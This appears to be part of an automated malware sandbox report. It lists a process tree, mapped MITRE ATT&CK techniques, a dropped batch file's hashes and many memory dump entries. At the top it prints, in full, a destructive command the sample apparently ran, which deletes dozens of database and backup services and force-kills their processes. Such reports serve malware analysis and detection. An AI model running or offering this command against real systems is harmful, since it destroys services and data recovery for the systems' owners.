"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
PID:1608

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
PID:3872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Impair Defenses

T1562

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat
Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
memory/208-404-0x0000000000000000-mapping.dmp

Download
memory/252-402-0x0000000000000000-mapping.dmp

Download
memory/524-657-0x0000000000000000-mapping.dmp

Download
memory/744-506-0x0000000000000000-mapping.dmp

Download
memory/756-530-0x0000000000000000-mapping.dmp

Download
memory/760-409-0x0000000000000000-mapping.dmp

Download
memory/1012-392-0x0000000000000000-mapping.dmp

Download
memory/1016-393-0x0000000000000000-mapping.dmp

Download
memory/1184-203-0x0000000000000000-mapping.dmp

Download
memory/1432-741-0x0000000000000000-mapping.dmp

Download
memory/1608-408-0x0000000000000000-mapping.dmp

Download
memory/2124-190-0x0000000005BD0000-0x0000000005BF2000-memory.dmp

Filesize
136KB

Download
memory/2124-188-0x0000000005B00000-0x0000000005B92000-memory.dmp

Filesize
584KB

Download
memory/2124-134-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-135-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-136-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-137-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-138-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-139-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-140-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-141-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-142-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-143-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-144-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-145-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-146-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-147-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-148-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-149-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-150-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-151-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-152-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download
memory/2124-153-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-154-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-155-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-156-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-157-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-158-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-159-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-121-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-161-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-162-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-122-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-164-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-165-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-166-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-167-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-168-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-169-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-170-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-171-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-172-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-173-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-174-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-175-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-176-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-177-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-178-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-179-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-180-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-181-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-182-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-183-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-184-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-187-0x00000000057B0000-0x00000000059D6000-memory.dmp

Filesize
2.1MB

Download
memory/2124-123-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-189-0x00000000060A0000-0x000000000659E000-memory.dmp

Filesize
5.0MB

Download
memory/2124-120-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-192-0x0000000005D10000-0x0000000006060000-memory.dmp

Filesize
3.3MB

Download
memory/2124-132-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-131-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-124-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-125-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-160-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-133-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-163-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-126-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-127-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-128-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-129-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2124-130-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2232-882-0x0000000000000000-mapping.dmp

Download
memory/2236-677-0x0000000000000000-mapping.dmp

Download
memory/2276-907-0x0000000000000000-mapping.dmp

Download
memory/2428-678-0x0000000000000000-mapping.dmp

Download
memory/2516-762-0x0000000000000000-mapping.dmp

Download
memory/2708-722-0x0000000000000000-mapping.dmp

Download
memory/2884-906-0x0000000000000000-mapping.dmp

Download
memory/3048-823-0x0000000000000000-mapping.dmp

Download
memory/3052-487-0x0000000000000000-mapping.dmp

Download
memory/3188-531-0x0000000000000000-mapping.dmp

Download
memory/3596-335-0x0000000000000000-mapping.dmp

Download
memory/3604-486-0x0000000000000000-mapping.dmp

Download
memory/3852-437-0x0000000000000000-mapping.dmp

Download
memory/3864-435-0x0000000000000000-mapping.dmp

Download
memory/3868-721-0x0000000000000000-mapping.dmp

Download
memory/3872-436-0x0000000000000000-mapping.dmp

Download
memory/3920-271-0x0000000000000000-mapping.dmp

Download
memory/3960-595-0x0000000000000000-mapping.dmp

Download
memory/4044-555-0x0000000000000000-mapping.dmp

Download
memory/4060-742-0x0000000000000000-mapping.dmp

Download
memory/4064-554-0x0000000000000000-mapping.dmp

Download
memory/4128-803-0x0000000000000000-mapping.dmp

Download
memory/4160-231-0x0000000000000000-mapping.dmp

Download
memory/4348-822-0x0000000000000000-mapping.dmp

Download
memory/4392-615-0x0000000000000000-mapping.dmp

Download
memory/4396-697-0x0000000000000000-mapping.dmp

Download
memory/4436-336-0x0000000000000000-mapping.dmp

Download
memory/4460-658-0x0000000000000000-mapping.dmp

Download
memory/4464-926-0x0000000000000000-mapping.dmp

Download
memory/4488-278-0x0000000000000000-mapping.dmp

Download
memory/4576-637-0x0000000000000000-mapping.dmp

Download
memory/4584-844-0x0000000000000000-mapping.dmp

Download
memory/4596-927-0x0000000000000000-mapping.dmp

Download
memory/4612-466-0x0000000000000000-mapping.dmp

Download
memory/4668-362-0x0000000000000000-mapping.dmp

Download
memory/4676-636-0x0000000000000000-mapping.dmp

Download
memory/4688-467-0x0000000000000000-mapping.dmp

Download
memory/4700-616-0x0000000000000000-mapping.dmp

Download
memory/4712-594-0x0000000000000000-mapping.dmp

Download
memory/4732-363-0x0000000000000000-mapping.dmp

Download
memory/4860-761-0x0000000000000000-mapping.dmp

Download
memory/4872-842-0x0000000000000000-mapping.dmp

Download
memory/4928-574-0x0000000000000000-mapping.dmp

Download
memory/4932-783-0x0000000000000000-mapping.dmp

Download
memory/4940-802-0x0000000000000000-mapping.dmp

Download
memory/4948-782-0x0000000000000000-mapping.dmp

Download
memory/4952-218-0x0000000000000000-mapping.dmp

Download
memory/4984-863-0x0000000000000000-mapping.dmp

Download
memory/4988-575-0x0000000000000000-mapping.dmp

Download
memory/5036-372-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5036-781-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/5036-256-0x0000000000408F1E-mapping.dmp

Download
memory/5088-310-0x0000000000000000-mapping.dmp

Download
memory/5104-862-0x0000000000000000-mapping.dmp

Download
memory/5112-309-0x0000000000000000-mapping.dmp

Download